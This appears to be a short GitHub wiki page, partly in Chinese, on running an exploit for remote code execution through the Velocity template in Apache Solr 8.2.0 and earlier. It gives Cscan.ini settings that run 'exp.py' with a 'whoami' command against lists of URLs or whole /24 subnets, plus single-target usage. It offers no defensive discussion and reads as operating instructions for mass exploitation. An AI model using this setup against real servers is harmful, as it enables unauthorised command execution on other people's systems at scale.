Skip to content

漏洞利用 Apache Solr 8.2.0 Velocity RCE 0day Exploit

k8gege edited this page Nov 2, 2019 · 9 revisions

Apache Solr <=8.2.0 Velocity Template 0day Exploit

Cscan.ini配置

0x001 批量URL配置(url.txt)
[Cscan]
exe=F:\Python279\python.exe
arg=exp.py $ip$ whoami
0x002 批量C段配置
[Cscan]
exe=F:\Python279\python.exe
arg=exp.py http://$ip$:8983 whoami
0x003 Exploit 单个: python exp.py url cmd
或 Cscan url
批量C段: Cscan 192.168.1.8/24
批量URL: Cscan (同目录放url.txt)

Clone this wiki locally